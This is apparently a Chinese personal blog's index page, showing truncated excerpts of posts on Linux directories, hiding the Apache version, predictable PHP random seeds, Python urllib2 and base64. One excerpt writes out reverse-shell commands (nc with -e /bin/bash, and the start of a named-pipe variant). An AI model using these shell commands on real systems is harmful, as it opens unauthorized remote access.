Linxu下重要文件

in Linux read (4268)

/:根目录/boot:系统内核映像以及启动文件/tmp:系统临时文件,用户临时文件在/var/tmp/lib:启动时需要的库文件,非启动时需要的库文件放在/usr/lib,内核模块放在/lib/modules/(kernel version)下/proc:系统状态,实际上磁...

继续阅读

配置隐藏Apache版本号

in Web read (4291)

在httpd.conf中有两处需要修改。1.ServerTokens该选项用于控制服务器是否响应来自客户端的请求,向客户端输出服务器系统类型或者其他重要信息。为了保证安全,应该改为ProductOnly大部分默认情况下为OS2.ServerSignature该选项控制由系统...

继续阅读

PHP中的伪随机数字

in Web,安全研究 read (4407)

PHP中使用srand来初始化随机数,通常选用time()函数来生成种子,但是这也带来了安全问题,也就是如果我可以获取这个种子,那么我就·可以生成这个特定的随机数,换句话说,相同的种子会产生相同的随机数,写个脚本测试一下。<?php $sead = time()...

继续阅读

Unix系统一般都有NC的,但是-e选项一般都默认不编译。原生的反弹shell做法是nc -l -vv -p 2222 -e /bin/bash如果这样无法反弹的话,可以尝试下面的方法现在/tmp下创建一个普通管道mknod /tmp/backpipe p或mkfifo /...

继续阅读

Python urllib2

in Python read (10319)

通过urllib2获取网页内容import urllib2response = urllib2.urlopen('http://www.baidu.com')html = response.read()print html####import urllib2req = ur...

继续阅读

Python之一个脑残的问题

in Python,Code Review read (19278)

本来想写一个可以编码解码BASE64的小脚本,结果出了个问题,使用base64.b64encoding(str)的时候,总提示模块中没有这个方法,于是dir(base64),发现只有寥寥几个方法,根本没有编码和解码的方法。文件如下:import sysimport base...

继续阅读

lightless

弱小和无知不是生存障碍,傲慢才是。